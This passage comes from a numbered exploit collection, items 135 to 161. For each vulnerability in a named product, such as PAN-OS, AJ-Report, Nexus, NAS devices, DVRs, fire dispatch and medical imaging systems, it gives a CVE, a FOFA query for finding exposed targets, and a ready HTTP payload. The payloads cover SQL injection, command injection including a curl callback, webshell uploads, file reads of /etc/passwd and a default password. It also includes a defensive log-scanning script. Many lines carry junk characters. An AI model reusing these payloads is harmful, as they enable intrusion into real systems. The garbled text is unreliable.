jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

2 m1 I1 ~3 w/ a* z& ^136. NextChat cors SSRF
1 C: g7 B$ i5 {% O$ V0 n, \8 QCVE-2023-497855 b' ^  N/ q" b* @
FOFA:title="NextChat"
6 S& B. p8 m8 v5 KGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1  _0 @7 V* P# e  K. R
Host: x.x.x.x:10000, g9 g( V5 V5 b$ ~4 j. C+ Q) v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* n6 A& M& o# iConnection: close
! }+ @# E/ B1 a; r( M! ^1 c8 hAccept: */*- ]6 P, C. n- }, K" O  M
Accept-Language: en  R. M9 L8 {+ u* C
Accept-Encoding: gzip# C+ x8 f. a0 i, q4 u/ w# w' b

( U0 H- y! V0 a$ G( @/ s3 g/ _2 j4 K
137. 福建科立迅通信指挥调度平台down_file.php sql注入
" V* v8 [: n! K% q0 f' t* K3 kCVE-2024-2620
+ I* m' k/ B! ~4 `. o* }( m4 CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 d" M3 n' c+ D# cGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.14 S, N4 l! m- w* n9 p; {) W
Host: x.x.x.x
  }' V0 H0 ]6 h2 H0 A+ b7 V9 g: uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, [5 Q! l: U6 f! B+ h" ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 L5 u) Q* P( b1 k. k9 H) k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' H4 p& F" m7 _5 mAccept-Encoding: gzip, deflate, br. x- h2 L6 h- |* q
Connection: close
# g' I+ r# M5 M; I" e- {* o: q7 C# {Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj* D- R' P! n% b' q$ \9 F
Upgrade-Insecure-Requests: 1
+ M3 ]5 d* H! s: ^4 U; `7 C, p

1 P. S: K" o1 ]- t138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, V$ f! _, @3 R: k2 Q7 e6 gCVE-2024-26210 {; m8 c( s! F  L+ c& |& @* Q* h1 @
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 i1 |6 R1 }1 |0 t& F' t1 {GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1# E1 }& `. A0 s2 V
Host: x.x.x.x
* Y/ C  |  Z! Y5 Z3 a' C  E. o. }* yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ h+ a3 r. I1 m: i( q; f4 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. s0 v% X* @- M+ x2 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! n6 z0 c+ [% ?8 x
Accept-Encoding: gzip, deflate, br
- r$ p, \" y; K3 d2 DConnection: close
8 M$ }# f3 S" [4 Y: L: JUpgrade-Insecure-Requests: 1
; h4 y' |0 S. A# G4 Q
$ O+ P6 m# b3 ~4 g( j. u- Y" S2 ?2 z2 f' U* G
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
9 B1 m; }6 V* X- ECVE-2024-2622
6 M: Q2 p% Q7 p& \4 I# PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& v  b- z5 o- `" _) P' rGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1* _! ~% u9 X  ~: x# q" z
Host: x.x.x.x) B/ h7 n( s! n% P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0  M* s& K1 X% N7 k: }$ K. Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 g+ `" w2 s! ~/ ]1 {- _" wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: Z& P$ D* {% I' uAccept-Encoding: gzip, deflate, br! i8 K& t+ J7 v* }. U1 U: m
Connection: close! O  o3 {( X% e8 O) z# T
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
8 z+ L- ~2 P8 q) O6 `" kUpgrade-Insecure-Requests: 1; g8 _8 D% k) }) \3 _. K/ |/ e

: V! s4 g& F  ?8 v7 D; H, j7 \: T3 Q, q
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
" k0 Q* h* D, wCVE-2024-2566
" b) r: |$ m* L) s! TFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 u0 n; d' d4 u0 @( k6 BGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.14 }: e" N7 q! y7 d& T* n4 N
Host: x.x.x.x
' P: R; ^' U) s+ R7 G) F" G0 E8 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 L/ H$ V% E) ]/ M9 A: U7 S4 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 U- b: ^! _5 R) D, J1 s! U/ T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 O' V+ O/ W& E
Accept-Encoding: gzip, deflate, br
: l: R9 v5 U; F5 `$ F) k( k- W/ iConnection: close2 z. N( I2 Y0 O# T( T. R1 A
Cookie: authcode=h8g9& U; p* D  D( d
Upgrade-Insecure-Requests: 1" ^; `; x, o7 J7 F1 l7 u
- P# }. J4 `7 {& X" Q  }
. t& h0 P# o; v8 j3 V+ P- u" J! {" A
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- f7 m& u" t; R/ Q! QFOFA:body="指挥调度管理平台") W  p. {* W5 e$ j- D0 c
POST /app/ext/ajax_users.php HTTP/1.1
% @, q- A4 X4 M4 }Host: your-ip0 J6 L8 Q8 ?' t/ e  n4 @
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info0 E- B$ b0 j( _$ }
Content-Type: application/x-www-form-urlencoded
7 z6 E/ m/ Y" Q6 ^0 q2 w+ e' B7 H% W+ @3 U4 h. ?& ^4 v" u
* Q7 l' r+ K+ B3 ?( E
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
7 x/ x# Y9 C# j/ {% P8 A0 C3 a; b- n+ O; f3 J  W: [7 h

, F& c, K8 K8 Y! k142. CMSV6车辆监控平台系统中存在弱密码
( ?& S% u! L& ^% ^% eCVE-2024-29666+ y  h6 V$ ~5 r% I! m/ B. Q" T- |
FOFA:body="/808gps/"
" _# r. C: F4 K& [' madmin/admin
3 X( m# |0 M  i. i5 D$ n, x, n143. Netis WF2780 v2.1.40144 远程命令执行
* G& d6 B7 x) L1 L8 ]CVE-2024-258509 e4 l, g; ~% z) c! v1 a, J: O
FOFA:title='AP setup' && header='netis') |$ P& p$ L7 R# d4 K- A
PAYLOAD
8 A& o8 x* u& Q) ?; B8 V! m$ J
  o  f7 N% k. P: t1 v- `  V144. D-Link nas_sharing.cgi 命令注入
! j: C3 r+ a1 G( eFOFA:app="D_Link-DNS-ShareCenter"# _+ B5 r5 b% j1 l* |7 x2 b
system参数用于传要执行的命令1 {) L$ E! W# Z3 e
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1) E& h3 }$ Z# y
Host: x.x.x.x
: J5 O( m# G& I9 F  q" \7 o' RUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
' r3 T: L- t. q6 X5 _+ L0 GConnection: close
: B1 Y9 f! M, ^$ `# m, tAccept: */*& K6 y0 P' t; ?- U- A" N) h; t: C
Accept-Language: en& w6 |* r% A/ r: Y
Accept-Encoding: gzip
/ R8 f6 a6 o9 |& y3 P8 S0 b* C6 F& A
! N1 n! X# G* y, l- f
0 y# [. \: x) G) ]# [145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
4 Z* n/ o4 x: a: e% n3 k8 p6 ZCVE-2024-3400
/ _( ^+ J. Z- w# T- kFOFA:icon_hash="-631559155"
* J7 e: Q% g" HGET /global-protect/login.esp HTTP/1.1
: L( G5 q, T* B5 oHost: 192.168.30.112:10055 r$ B5 r' L; m( e5 q% C, }9 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 T; \: h  P7 _1 o1 T' `# ^
Connection: close8 ^5 j( v% C7 B& J, L( K- _
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;$ k# T( \8 |; D1 g5 S. o
Accept-Encoding: gzip
, y% o' W: k+ S. }' y; }# k
. ]9 Y- t" K, U. E' O$ ~3 W- i
1 f/ Y, E: F6 |; ^146. MajorDoMo thumb.php 未授权远程代码执行$ I- p) {4 T* A
CNVD-2024-02175
9 r. o& O5 j% t- ?5 {. zFOFA:app="MajordomoSL"$ H. E, }; y& ^' \! k: s
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1$ K% Z+ ?( ~1 q
Host: x.x.x.x5 ?% S# P3 `. z% ^7 b3 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
) g! X8 P7 m* |7 w2 w+ Z  V6 fAccept-Charset: utf-8# y' ^, \/ \3 Q; O, n* w
Accept-Encoding: gzip, deflate" b  N" Y* Q* X
Connection: close; C2 U2 @1 f6 h( c5 f

; |7 f8 d4 E$ w7 ^6 d4 q' r1 v% E1 s) [2 x# A, G8 A: k
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ S/ |) u. [+ WCVE-2024-32399  x( E4 z4 H  Q3 ]7 G
FOFA:body="RaidenMAILD"
  F2 g% K2 y* bGET /webeditor/../../../windows/win.ini HTTP/1.1
$ H9 A( W5 {1 D1 ~" FHost: 127.0.0.1:81
  ]$ Z1 ?1 o$ V% k: H5 y% GCache-Control: max-age=0
8 C3 B4 H- K& o7 P8 d. n9 YConnection: close
8 f4 o4 u" E/ L3 c. Q' }
8 P" s: ]& b  a/ z6 K6 c: \  N/ n, s2 n/ |& C
148. CrushFTP 认证绕过模板注入
6 K) P3 S$ @% V: B( w  \CVE-2024-4040
) _' X* y  v1 `* bFOFA:body="CrushFTP"8 H# w9 k, p* {: D
PAYLOAD, C; T3 w/ N8 e6 ?1 I6 i; x$ W

+ g; I9 c- E3 b: b( `. b149. AJ-Report开源数据大屏存在远程命令执行' d4 E2 Z8 b' }% c5 d% L
FOFA:title="AJ-Report"5 w( F5 j6 p/ u+ x
6 s5 s; D( B2 O* v7 B# }
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1, r* V- E2 y9 M+ B+ y. L  a
Host: x.x.x.x
) l! u+ m( ]+ ]4 V" ]( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- p7 _, ]% @0 x, f2 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 F3 Y- K0 V7 q, W& x* A1 W  I
Accept-Encoding: gzip, deflate, br
& n. T7 [. f) C0 y- QAccept-Language: zh-CN,zh;q=0.9; P5 u$ L4 k, e% P# [2 ^# k
Content-Type: application/json;charset=UTF-8/ l, z) m  n3 j( v, F/ q
Connection: close; l3 e5 ?1 A) M- |2 z2 o

( E, @/ d! }$ @2 a+ d. m{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
  g# J8 k* F+ E' Z' t" C" l
3 F7 f$ W, H( D5 q0 Q5 v; y150. AJ-Report 1.4.0 认证绕过与远程代码执行' }3 [0 e' Y% [& Y5 S! [! M
FOFA:title="AJ-Report"
& _5 C2 ]0 c2 P: GPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' H9 R4 K( C7 m8 s1 D$ VHost: x.x.x.x2 @* c+ s% A0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 ?2 ]  H0 Y3 g7 X. ]3 |# ~1 f- V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# [8 S5 R$ O# {0 G- Z5 FAccept-Encoding: gzip, deflate, br4 D  f, e8 h3 W7 `6 a8 w! s0 T
Accept-Language: zh-CN,zh;q=0.9
; s! s& ^. \) C3 g8 t* @Content-Type: application/json;charset=UTF-8# m* G) @% q2 t  T! N9 i
Connection: close( _$ j5 f# t2 t
Content-Length: 339
7 }- ^* T& L8 X2 S; h" `% ]7 \! k% U! o- b2 u4 D1 h. o
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: Z7 B, T& i7 y4 R- l
7 o4 z' C3 L; e) P4 Q, p5 r6 q/ V* E9 L! H5 Q  x& `
151. AJ-Report 1.4.1 pageList sql注入  P4 L9 t9 u- L5 ]! ?" v% n
FOFA:title="AJ-Report"5 W8 ?1 F" u0 E0 `
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
0 k* y+ }3 P8 ?( o5 R6 Z8 kHost: x.x.x.x
7 ^9 f' R1 O5 T: z+ k5 R% DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! T8 E( i3 t/ N- @! ]Connection: close
. m! }8 e0 |( ^0 c7 j3 C+ W6 kAccept-Encoding: gzip  I" Y; a% y9 w/ N0 r/ i
) U' S/ h4 n2 G8 P
/ x, B0 D; h9 p
152. Progress Kemp LoadMaster 远程命令执行
: X% x# {/ R! zCVE-2024-1212& U3 Z3 W' @3 \' ^" ?& B* I/ h
LoadMaster <= 7.2.59.2 (GA)$ m+ h+ @( ]0 k1 G3 a
LoadMaster<=7.2.54.8 (LTSF)
& Q* v% w5 A- P/ j* YLoadMaster <= 7.2.48.10 (LTS)
# Y- G- ~( V/ V6 [, rFOFA:body="LoadMaster"" [! U+ V( a$ w( C4 h
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码1 p1 S  s5 L1 _$ i) i* r
GET /access/set?param=enableapi&value=1 HTTP/1.15 f3 b0 K# ]. ^+ j' j/ q
Host: x.x.x.x0 h8 M" o- U6 z% y4 G! [: f1 ?5 r+ c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.17 t0 E3 O% e& Y8 I' a- W
Connection: close
; H+ M6 B& q# T$ m& d4 [Accept: */*: j5 o! E5 D2 K5 p: a! E: N
Accept-Language: en
$ D& u% q2 ]7 j' D: qAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
# B% H8 ]+ Q9 |! _  X+ ~; {Accept-Encoding: gzip" y- z. \) m& _; {
# _6 ]4 v  E0 Z" y
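Several of the requests above share a small set of lexical tells that a defender can match in proxy or WAF logs without knowing the product: a `..` segment in the path, a query value or a cookie (items 126, 129, 145, 147); a `;` inside a path segment or a path-shaped parameter (items 132, 149, 150, 151); a base64 blob in a parameter or in the Basic credential that decodes to SQL or shell text (items 122, 152); and backticks or `${IFS}` in a cookie (item 145). The following Python is an added example written for this page, not code from the original article or from any of the vendors listed. It runs those checks over constructed request records; the record layout, the rule names and the `example.invalid` callback host are assumptions made for the example.

```python
"""Added example: lexical checks over request records for the request shapes
collected on this page.  Records are constructed; the layout is an assumption."""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Constructed request records shaped like a reverse-proxy/WAF export: the request
# target plus the headers these checks read.  Hosts and the callback are placeholders.
SAMPLE_RECORDS = [
    {"id": "aiohttp", "target": "/static/../../../../../etc/passwd", "headers": {}},
    {"id": "teamcity", "target": "/pwned?jsp=/app/rest/users;.jsp", "headers": {}},
    {"id": "ajreport", "target": "/dataSetParam/verification;swagger-ui/", "headers": {}},
    {"id": "coldfusion", "target": "/pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100", "headers": {}},
    {"id": "baichuo", "target": "/importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql", "headers": {}},
    {"id": "kemp", "target": "/access/set?param=enableapi&value=1",
     "headers": {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}},
    {"id": "panos", "target": "/global-protect/login.esp",
     "headers": {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}example.invalid`;"}},
    {"id": "benign", "target": "/static/css/app.css?v=3", "headers": {"Cookie": "PHPSESSID=abc123"}},
]

SQL_WORDS = re.compile(r"\b(select|union|sleep|pg_sleep|updatexml|extractvalue)\b", re.I)
SHELL_META = re.compile(r"[`;|]|\$\(|\$\{")


def query_params(query):
    """Split on '&' only: a ';' inside a value is part of the signal, not a separator."""
    out = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            out.append((unquote(name), unquote(value)))
    return out


def has_traversal(text):
    """True if any '/'- or '\\'-separated segment is '..' after two rounds of percent-decoding."""
    decoded = unquote(unquote(text)).replace("\\", "/")
    return ".." in decoded.split("/")


def decode_b64_text(value):
    """Decoded text if value is valid base64 holding printable ASCII, else None."""
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def scan_record(rec):
    """Return [(rule, location), ...] for one request record."""
    findings = []
    parts = urlsplit(rec["target"])          # urlsplit keeps ';' inside the path
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}

    if has_traversal(parts.path):
        findings.append(("path-traversal", "path"))
    if any(";" in seg for seg in unquote(parts.path).split("/")):
        findings.append(("matrix-segment", "path"))

    for name, value in query_params(parts.query):
        if has_traversal(value):
            findings.append(("path-traversal", f"param {name}"))
        if value.startswith("/") and ";" in value:
            findings.append(("matrix-segment", f"param {name}"))
        decoded = decode_b64_text(value)
        if decoded and SQL_WORDS.search(decoded):
            findings.append(("b64-sql", f"param {name}"))
        if decoded and SHELL_META.search(decoded):
            findings.append(("b64-shell", f"param {name}"))

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        decoded = decode_b64_text(auth[6:].strip())
        if decoded and SHELL_META.search(decoded):
            findings.append(("b64-shell", "basic-auth"))

    for piece in headers.get("cookie", "").split(";"):
        cname, sep, cval = piece.strip().partition("=")
        if not sep:
            continue
        if has_traversal(cval):
            findings.append(("path-traversal", f"cookie {cname}"))
        if SHELL_META.search(cval):
            findings.append(("shell-meta", f"cookie {cname}"))
    return findings


def scan_all(records):
    """Map record id -> sorted list of the rule names it triggered."""
    return {r["id"]: sorted({rule for rule, _ in scan_record(r)}) for r in records}


if __name__ == "__main__":
    for rid, rules in scan_all(SAMPLE_RECORDS).items():
        print(f"{rid:12} {', '.join(rules) or '-'}")
```

Feed it real records by building SAMPLE_RECORDS from your own log parser. Scope the matrix-segment rule to the paths of the applications listed here, since servlet containers legitimately append `;jsessionid=` to URLs, and treat the base64 rules as a triage signal rather than proof: they only fire on blobs that decode to clean printable ASCII.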

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: copy the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Uploaded file (path is returned in the response): http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
6 v3 D7 N5 r- [. e6 _# Q, @: [
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
